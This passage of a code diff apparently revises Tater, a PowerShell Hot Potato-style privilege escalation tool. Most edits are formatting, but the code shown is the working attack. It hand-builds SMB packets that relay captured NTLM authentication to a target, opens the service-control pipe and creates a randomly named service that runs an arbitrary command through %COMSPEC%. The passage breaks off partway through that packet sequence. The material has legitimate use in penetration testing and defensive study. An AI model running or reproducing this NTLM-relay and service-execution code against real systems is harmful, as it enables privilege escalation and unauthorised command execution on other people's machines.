+                    $tater.console_queue.Add("$(Get-Date -format 's') - Remove scheduled task " + $tater.task + " manually when finished")
                 }
+
             }
 
-        $tater.console_queue.add("$(Get-Date -format 's') - Tater was successful and has exited")
+        $tater.console_queue.Add("$(Get-Date -format 's') - Tater was successful and has exited")
         }
         else
         {
-            $tater.console_queue.add("$(Get-Date -format 's') - Tater was not successful and has exited")
+            $tater.console_queue.Add("$(Get-Date -format 's') - Tater was not successful and has exited")
         }
 
         Start-Sleep -s 1 
         $tater.running = $false
     }
+
 }
 
 # SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response
 $SMB_NTLM_functions_scriptblock =
 {
-    Function SMBNTLMChallenge
+
+    function SMBNTLMChallenge
     {
-        param ([byte[]]$payload_bytes)
+        param ([Byte[]]$payload_bytes)
 
         $payload = [System.BitConverter]::ToString($payload_bytes)
         $payload = $payload -replace "-",""
@@ -401,12 +431,14 @@ $SMB_NTLM_functions_scriptblock =
 
         return $NTLM_challenge
     }
+
 }
 
 # SMB Relay Challenge ScriptBlock - gathers NTLM server challenge from relay target
 $SMB_relay_challenge_scriptblock =
 {
-    Function SMBRelayChallenge
+
+    function SMBRelayChallenge
     {
         param ($SMB_relay_socket,$HTTP_request_bytes)
 
@@ -416,62 +448,71 @@ $SMB_relay_challenge_scriptblock =
         }
         
         $SMB_relay_challenge_bytes = New-Object System.Byte[] 1024
-
         $i = 0
         
         :SMB_relay_challenge_loop while ($i -lt 2)
         {
+
             switch ($i)
             {
-                0 {
-                    [Byte[]] $SMB_relay_challenge_send = (0x00,0x00,0x00,0x2f,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x00,0x18,0x01,0x48)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff)`
-                        + $tater.process_ID_bytes`
-                        + (0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x02,0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00)
+
+                0
+                {
+                    $SMB_relay_challenge_send = 0x00,0x00,0x00,0x2f,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x00,
+                                                0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                                0x00,0x00,0xff,0xff +
+                                                $tater.process_ID_bytes + 
+                                                0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x02,0x4e,0x54,0x20,0x4c,0x4d,
+                                                0x20,0x30,0x2e,0x31,0x32,0x00
                 }
                 
-                1 { 
-                    $SMB_blob_length = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length))
+                1
+                { 
+                    $SMB_blob_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length))
                     $SMB_blob_length = $SMB_blob_length -replace "-00-00",""
-                    $SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
-                    $SMB_byte_count = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length + 28))
+                    $SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+                    $SMB_byte_count = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 28))
                     $SMB_byte_count = $SMB_byte_count -replace "-00-00",""
-                    $SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
-                    $SMB_netbios_length = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length + 87))
+                    $SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+                    $SMB_netbios_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 87))
                     $SMB_netbios_length = $SMB_netbios_length -replace "-00-00",""
-                    $SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
-                    [array]::Reverse($SMB_netbios_length)
+                    $SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+                    [Array]::Reverse($SMB_netbios_length)
                     
-                    [Byte[]] $SMB_relay_challenge_send = (0x00,0x00)`
-                        + $SMB_netbios_length`
-                        + (0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x03,0xc8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff)`
-                        + $tater.process_ID_bytes`
-                        + (0x00,0x00,0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,0x01,0x00,0x00,0x00,0x00,0x00)`
-                        + $SMB_blob_length`
-                        + (0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80)`
-                        + $SMB_byte_count`
-                        + $HTTP_request_bytes`
-                        + (0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00,0x77,0x00,0x73,0x00,0x00,0x00)`
-                        + (0x6a,0x00,0x43,0x00,0x49,0x00,0x46,0x00,0x53,0x00,0x00,0x00)
+                    $SMB_relay_challenge_send = 0x00,0x00 +
+                                                $SMB_netbios_length +
+                                                0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x03,0xc8,0x00,
+                                                0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff +
+                                                $tater.process_ID_bytes +
+                                                0x00,0x00,0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,
+                                                0x01,0x00,0x00,0x00,0x00,0x00 +
+                                                $SMB_blob_length +
+                                                0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 +
+                                                $SMB_byte_count +
+                                                $HTTP_request_bytes +
+                                                0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00,0x77,0x00,0x73,
+                                                0x00,0x00,0x00,0x6a,0x00,0x43,0x00,0x49,0x00,0x46,0x00,0x53,0x00,
+                                                0x00,0x00
                 }
+
             }
 
-            $SMB_relay_challenge_stream.Write($SMB_relay_challenge_send, 0, $SMB_relay_challenge_send.length)
+            $SMB_relay_challenge_stream.Write($SMB_relay_challenge_send,0,$SMB_relay_challenge_send.Length)
             $SMB_relay_challenge_stream.Flush()
-    
-            $SMB_relay_challenge_stream.Read($SMB_relay_challenge_bytes, 0, $SMB_relay_challenge_bytes.length)
-
+            $SMB_relay_challenge_stream.Read($SMB_relay_challenge_bytes,0,$SMB_relay_challenge_bytes.Length)
             $i++
         }
         
         return $SMB_relay_challenge_bytes
     }
+
 }
 
 # SMB Relay Response ScriptBlock - sends NTLM reponse to relay target
 $SMB_relay_response_scriptblock =
 {
-    Function SMBRelayResponse
+
+    function SMBRelayResponse
     {
         param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_user_ID)
     
@@ -482,51 +523,53 @@ $SMB_relay_response_scriptblock =
             $SMB_relay_response_stream = $SMB_relay_socket.GetStream()
         }
         
-        $SMB_blob_length = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length))
+        $SMB_blob_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length))
         $SMB_blob_length = $SMB_blob_length -replace "-00-00",""
-        $SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
-        $SMB_byte_count = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length + 28))
+        $SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMB_byte_count = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 28))
         $SMB_byte_count = $SMB_byte_count -replace "-00-00",""
-        $SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
-        $SMB_netbios_length = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length + 88))
+        $SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMB_netbios_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 88))
         $SMB_netbios_length = $SMB_netbios_length -replace "-00-00",""
-        $SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
-        [array]::Reverse($SMB_netbios_length)
+        $SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        [Array]::Reverse($SMB_netbios_length)
         $j = 0
 
         :SMB_relay_response_loop while ($j -lt 1)
         {
-            [Byte[]] $SMB_relay_response_send = (0x00,0x00)`
-                + $SMB_netbios_length`
-                + (0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x03,0xc8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff)`
-                + $tater.process_ID_bytes`
-                + $SMB_user_ID`
-                + (0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,0x01,0x00,0x00,0x00,0x00,0x00)`
-                + $SMB_blob_length`
-                + (0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80)`
-                + $SMB_byte_count`
-                + $HTTP_request_bytes`
-                + (0x00,0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00,0x77,0x00,0x73,0x00,0x00,0x00)`
-                + (0x6a,0x00,0x43,0x00,0x49,0x00,0x46,0x00,0x53,0x00,0x00,0x00)
+            $SMB_relay_response_send = 0x00,0x00 +
+                                       $SMB_netbios_length +
+                                       0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x03,0xc8,0x00,0x00,
+                                       0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff +
+                                       $tater.process_ID_bytes +
+                                       $SMB_user_ID +
+                                       0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,0x01,0x00,0x00,
+                                       0x00,0x00,0x00 +
+                                       $SMB_blob_length +
+                                       0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 +
+                                       $SMB_byte_count +
+                                       $HTTP_request_bytes +
+                                       0x00,0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00,0x77,0x00,0x73,
+                                       0x00,0x00,0x00,0x6a,0x00,0x43,0x00,0x49,0x00,0x46,0x00,0x53,0x00,0x00,
+                                       0x00
 
-            $SMB_relay_response_stream.write($SMB_relay_response_send, 0, $SMB_relay_response_send.length)
+            $SMB_relay_response_stream.Write($SMB_relay_response_send,0,$SMB_relay_response_send.Length)
         	$SMB_relay_response_stream.Flush()
-
-            $SMB_relay_response_stream.Read($SMB_relay_response_bytes, 0, $SMB_relay_response_bytes.length)
-            
+            $SMB_relay_response_stream.Read($SMB_relay_response_bytes,0,$SMB_relay_response_bytes.Length)
             $tater.SMB_relay_active_step = 2
-            
             $j++
-        
         }
+
         return $SMB_relay_response_bytes
     }
+
 }
 
 # SMB Relay Execute ScriptBlock - executes command within authenticated SMB session
 $SMB_relay_execute_scriptblock =
 {
-    Function SMBRelayExecute
+
+    function SMBRelayExecute
     {
         param ($SMB_relay_socket,$SMB_user_ID)
     
@@ -540,16 +583,16 @@ $SMB_relay_execute_scriptblock =
         $SMB_service_random = [String]::Join("00-", (1..20 | ForEach-Object{"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)}))
         $SMB_service = $SMB_service_random -replace "-00",""
         $SMB_service = $SMB_service.Substring(0,$SMB_service.Length-1)
-        $SMB_service = $SMB_service.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+        $SMB_service = $SMB_service.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
         $SMB_service = New-Object System.String ($SMB_service,0,$SMB_service.Length)
         $SMB_service_random += '00-00-00'
-        [Byte[]]$SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+        [Byte[]] $SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
         $SMB_referent_ID_bytes = [String](1..4 | ForEach-Object{"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
-        $SMB_referent_ID_bytes = $SMB_referent_ID_bytes.Split(" ") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+        $SMB_referent_ID_bytes = $SMB_referent_ID_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
         $Command = "%COMSPEC% /C `"" + $Command + "`""
         [System.Text.Encoding]::UTF8.GetBytes($Command) | ForEach-Object{ $SMB_relay_command += "{0:X2}-00-" -f $_ }
 
-        if([bool]($Command.length%2))
+        if([Bool]($Command.Length % 2))
         {
             $SMB_relay_command += '00-00'
         }
@@ -558,162 +601,197 @@ $SMB_relay_execute_scriptblock =
             $SMB_relay_command += '00-00-00-00'
         }    
         
-        [Byte[]]$SMB_relay_command_bytes = $SMB_relay_command.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
-        $SMB_service_data_length_bytes = [BitConverter]::GetBytes($SMB_relay_command_bytes.length + $SMB_service_bytes.length + 237)
+        [Byte[]] $SMB_relay_command_bytes = $SMB_relay_command.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMB_service_data_length_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length + $SMB_service_bytes.Length + 237)
         $SMB_service_data_length_bytes = $SMB_service_data_length_bytes[2..0]
-        $SMB_service_byte_count_bytes = [BitConverter]::GetBytes($SMB_relay_command_bytes.length + $SMB_service_bytes.length + 237 - 63)
+        $SMB_service_byte_count_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length + $SMB_service_bytes.Length + 174)
         $SMB_service_byte_count_bytes = $SMB_service_byte_count_bytes[0..1]   
-        $SMB_relay_command_length_bytes = [BitConverter]::GetBytes($SMB_relay_command_bytes.length / 2)
-
+        $SMB_relay_command_length_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length / 2)
         $k = 0
 
         :SMB_relay_execute_loop while ($k -lt 12)
         {
+
             switch ($k)
             {
             
-                0 {
-                    [Byte[]]$SMB_relay_execute_send = (0x00,0x00,0x00,0x45,0xff,0x53,0x4d,0x42,0x75,0x00,0x00,0x00,0x00,0x18,0x01,0x48)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff)`
-                        + $tater.process_ID_bytes`
-                        + $SMB_user_ID`
-                        + (0x00,0x00,0x04,0xff,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x1a,0x00,0x00,0x5c,0x5c,0x31,0x30,0x2e,0x31)`
-                        + (0x30,0x2e,0x32,0x2e,0x31,0x30,0x32,0x5c,0x49,0x50,0x43,0x24,0x00,0x3f,0x3f,0x3f,0x3f,0x3f,0x00)
+                0
+                {
+                    $SMB_relay_execute_send = 0x00,0x00,0x00,0x45,0xff,0x53,0x4d,0x42,0x75,0x00,0x00,0x00,0x00,
+                                              0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                              0x00,0x00,0xff,0xff +
+                                              $tater.process_ID_bytes +
+                                              $SMB_user_ID +
+                                              0x00,0x00,0x04,0xff,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x1a,0x00,
+                                              0x00,0x5c,0x5c,0x31,0x30,0x2e,0x31,0x30,0x2e,0x32,0x2e,0x31,0x30,
+                                              0x32,0x5c,0x49,0x50,0x43,0x24,0x00,0x3f,0x3f,0x3f,0x3f,0x3f,0x00
                 }
                   
-                1 {
-                    [Byte[]]$SMB_relay_execute_send = (0x00,0x00,0x00,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x00,0x00,0x00,0x00,0x18,0x02,0x28)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
-                        + $tater.process_ID_bytes`
-                        + $SMB_user_ID`
-                        + (0x03,0x00,0x18,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x16,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)`
-                        + (0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x01,0x00,0x00,0x00)`
-                        + (0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x08,0x00,0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00)
+                1
+                {
+                    $SMB_relay_execute_send = 0x00,0x00,0x00,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x00,0x00,0x00,0x00,
+                                              0x18,0x02,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                              0x00,0x00,0x00,0x08 +
+                                              $tater.process_ID_bytes +
+                                              $SMB_user_ID +
+                                              0x03,0x00,0x18,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x16,0x00,0x00,
+                                              0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,
+                                              0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x01,
+                                              0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x08,
+                                              0x00,0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00
                 }
                 
-                2 {
-                    [Byte[]]$SMB_relay_execute_send = (0x00,0x00,0x00,0x87,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
-                        + $tater.process_ID_bytes`
-                        + $SMB_user_ID`
-                        + (0x04,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00,0xff,0xff,0xff,0xff,0x08,0x00,0x48,0x00)`
-                        + (0x00,0x00,0x48,0x00,0x3f,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x16,0xd0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00)`
-                        + (0x01,0x00,0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38,0x00,0x10,0x03,0x02,0x00,0x00)`
-                        + (0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00)
+                2
+                {
+                    $SMB_relay_execute_send = 0x00,0x00,0x00,0x87,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
+                                              0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                              0x00,0x00,0x00,0x08 +
+                                              $tater.process_ID_bytes +
+                                              $SMB_user_ID +
+                                              0x04,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00,
+                                              0xff,0xff,0xff,0xff,0x08,0x00,0x48,0x00,0x00,0x00,0x48,0x00,0x3f,
+                                              0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x05,0x00,0x0b,0x03,0x10,0x00,
+                                              0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x16,0xd0,
+                                              0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
+                                              0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38,
+                                              0x00,0x10,0x03,0x02,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,
+                                              0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60,0x02,0x00,0x00,
+                                              0x00
                         
-                        $SMB_multiplex_id = (0x05)
+                    $SMB_multiplex_id = 0x05
                 }
                
-                3 { 
-                    [Byte[]]$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
+                3
+                { 
+                    $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
                 }
                 
-                4 {
-                    [Byte[]] $SMB_relay_execute_send = (0x00,0x00,0x00,0x9b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
-                        + $tater.process_ID_bytes`
-                        + $SMB_user_ID`
-                        + (0x06,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00,0xff,0xff,0xff,0xff,0x08,0x00,0x50)`
-                        + (0x00,0x00,0x00,0x5c,0x00,0x3f,0x00,0x00,0x00,0x00,0x00,0x5c,0x00,0x05,0x00,0x00,0x03,0x10,0x00,0x00)`
-                        + (0x00,0x5c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x38,0x00,0x00,0x00,0x00,0x00,0x0f,0x00,0x00,0x00,0x03)`
-                        + (0x00,0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00)`
-                        + $SMB_service_bytes`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x3f,0x00,0x0f,0x00)
+                4
+                {
+                    $SMB_relay_execute_send = 0x00,0x00,0x00,0x9b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
+                                              0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                              0x00,0x00,0x00,0x08 +
+                                              $tater.process_ID_bytes +
+                                              $SMB_user_ID +
+                                              0x06,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00,
+                                              0xff,0xff,0xff,0xff,0x08,0x00,0x50,0x00,0x00,0x00,0x5c,0x00,0x3f,
+                                              0x00,0x00,0x00,0x00,0x00,0x5c,0x00,0x05,0x00,0x00,0x03,0x10,0x00,
+                                              0x00,0x00,0x5c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x38,0x00,0x00,
+                                              0x00,0x00,0x00,0x0f,0x00,0x00,0x00,0x03,0x00,0x15,0x00,0x00,0x00,
+                                              0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 +
+                                              $SMB_service_bytes +
+                                              0x00,0x00,0x00,0x00,0x00,0x00,0x3f,0x00,0x0f,0x00
                         
-                        $SMB_multiplex_id = (0x07)
+                    $SMB_multiplex_id = 0x07
                 }
                 
-                5 {  
-                    [Byte[]]$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
+                5
+                {  
+                    $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
                 }
                 
-                6 {
-                    [Byte[]]$SMB_relay_execute_send = [ARRAY](0x00)`
-                        + $SMB_service_data_length_bytes`
-                        + (0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
-                        + $tater.process_ID_bytes`
-                        + $SMB_user_ID`
-                        + (0x08,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0xff,0xff,0xff,0xff,0x08,0x00)`
-                        + $SMB_service_byte_count_bytes`
-                        + (0x00,0x00)`
-                        + $SMB_service_byte_count_bytes`
-                        + (0x3f,0x00,0x00,0x00,0x00,0x00)`
-                        + $SMB_service_byte_count_bytes`
-                        + (0x05,0x00,0x00,0x03,0x10)`
-                        + (0x00,0x00,0x00)`
-                        + $SMB_service_byte_count_bytes`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0c,0x00)`
-                        + $SMB_context_handler`
-                        + (0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00)`
-                        + $SMB_service_bytes`
-                        + (0x00,0x00)`
-                        + $SMB_referent_ID_bytes`
-                        + (0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00)`
-                        + $SMB_service_bytes`
-                        + (0x00,0x00,0xff,0x01,0x0f,0x00,0x10,0x01,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)`
-                        + $SMB_relay_command_length_bytes`
-                        + (0x00,0x00,0x00,0x00)`
-                        + $SMB_relay_command_length_bytes`
-                        + $SMB_relay_command_bytes`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)
+                6
+                {
+                    $SMB_relay_execute_send = [Array]0x00 +
+                                              $SMB_service_data_length_bytes +
+                                              0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28,0x00,
+                                              0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08 +
+                                              $tater.process_ID_bytes +
+                                              $SMB_user_ID +
+                                              0x08,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,
+                                              0xff,0xff,0xff,0xff,0x08,0x00 +
+                                              $SMB_service_byte_count_bytes +
+                                              0x00,0x00 +
+                                              $SMB_service_byte_count_bytes +
+                                              0x3f,0x00,0x00,0x00,0x00,0x00 +
+                                              $SMB_service_byte_count_bytes +
+                                              0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00 +
+                                              $SMB_service_byte_count_bytes +
+                                              0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0c,
+                                              0x00 +
+                                              $SMB_context_handler +
+                                              0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 +
+                                              $SMB_service_bytes +
+                                              0x00,0x00 +
+                                              $SMB_referent_ID_bytes +
+                                              0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 +
+                                              $SMB_service_bytes +
+                                              0x00,0x00,0xff,0x01,0x0f,0x00,0x10,0x01,0x00,0x00,0x03,0x00,0x00,
+                                              0x00,0x00,0x00,0x00,0x00 +
+                                              $SMB_relay_command_length_bytes +
+                                              0x00,0x00,0x00,0x00 +
+                                              $SMB_relay_command_length_bytes +
+                                              $SMB_relay_command_bytes +
+                                              0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                              0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                              0x00,0x00
                         
-                        $SMB_multiplex_id = (0x09)
+                    $SMB_multiplex_id = 0x09
                 }
 
-                7 {
-                    [Byte[]]$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
+                7
+                {
+                    $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
+                }
+                
+                8
+                {
+                    $SMB_relay_execute_send = 0x00,0x00,0x00,0x73,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
+                                              0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                              0x00,0x00,0x00,0x08 +
+                                              $tater.process_ID_bytes +
+                                              $SMB_user_ID +
+                                              0x0a,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,
+                                              0xff,0xff,0xff,0xff,0x08,0x00,0x34,0x00,0x00,0x00,0x34,0x00,0x3f,
+                                              0x00,0x00,0x00,0x00,0x00,0x34,0x00,0x05,0x00,0x00,0x03,0x10,0x00,
+                                              0x00,0x00,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x00,
+                                              0x00,0x00,0x00,0x13,0x00 +
+                                              $SMB_context_handler +
+                                              0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+                }
+                
+                9
+                {
+                    $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
+                }
+                
+                10
+                { 
+                    $SMB_relay_execute_send = 0x00,0x00,0x00,0x6b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
+                                              0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                              0x00,0x00,0x00,0x08 +
+                                              $tater.process_ID_bytes +
+                                              $SMB_user_ID +
+                                              0x0b,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x0b,0x01,0x00,0x00,
+                                              0xff,0xff,0xff,0xff,0x08,0x00,0x2c,0x00,0x00,0x00,0x2c,0x00,0x3f,
+                                              0x00,0x00,0x00,0x00,0x00,0x2c,0x00,0x05,0x00,0x00,0x03,0x10,0x00,
